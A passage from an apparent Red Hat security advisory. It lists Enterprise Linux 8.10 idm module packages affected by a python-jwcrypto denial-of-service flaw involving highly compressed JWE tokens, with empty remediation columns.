| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-jwcrypto-0:0.5.0-2.module+el8.10.0+21691+df63127d.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-kdcproxy-0:0.4-5.module+el8.9.0+18911+94941f82.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-pyusb-0:1.0.0-9.1.module+el8.9.0+18911+94941f82.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-qrcode-0:5.1-12.module+el8.9.0+18911+94941f82.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-qrcode-core-0:5.1-12.module+el8.9.0+18911+94941f82.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-yubico-0:1.3.2-9.1.module+el8.9.0+18911+94941f82.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:pyusb-0:1.0.0-9.1.module+el8.9.0+18911+94941f82.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-common-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-common-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-healthcheck-0:0.12-3.module+el8.9.0+19692+fac39a03.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-healthcheck-core-0:0.12-3.module+el8.9.0+19692+fac39a03.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-python-compat-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:ipa-selinux-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python-jwcrypto-0:0.5.0-2.module+el8.10.0+21692+c9b201bc.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python-qrcode-0:5.1-12.module+el8.9.0+18920+2223d05e.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python-yubico-0:1.3.2-9.1.module+el8.9.0+18920+2223d05e.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-ipaclient-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-ipalib-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-jwcrypto-0:0.5.0-2.module+el8.10.0+21692+c9b201bc.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-pyusb-0:1.0.0-9.1.module+el8.9.0+18920+2223d05e.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-qrcode-0:5.1-12.module+el8.9.0+18920+2223d05e.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-qrcode-core-0:5.1-12.module+el8.9.0+18920+2223d05e.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:python3-yubico-0:1.3.2-9.1.module+el8.9.0+18920+2223d05e.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:client:8100020240417004735:143e9e98:pyusb-0:1.0.0-9.1.module+el8.9.0+18920+2223d05e.src | — |
Vendor Fix
fix
Workaround
|
An uncontrolled resource consumption vulnerability was found in python-jwcrypto. If a malicious JWE token with a high compression ratio is passed to the server, the server will consume a lot of memory and processing time, leading to a denial of service.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-0:4.9.13-9.module+el8.10.0+21691+df63127d.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-healthcheck-0:0.12-3.module+el8.9.0+19634+c162f948.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-healthcheck-0:0.12-3.module+el8.9.0+19634+c162f948.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-healthcheck-core-0:0.12-3.module+el8.9.0+19634+c162f948.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-python-compat-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-selinux-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch | — |
Vendor Fix
fix
Workaround
|
|
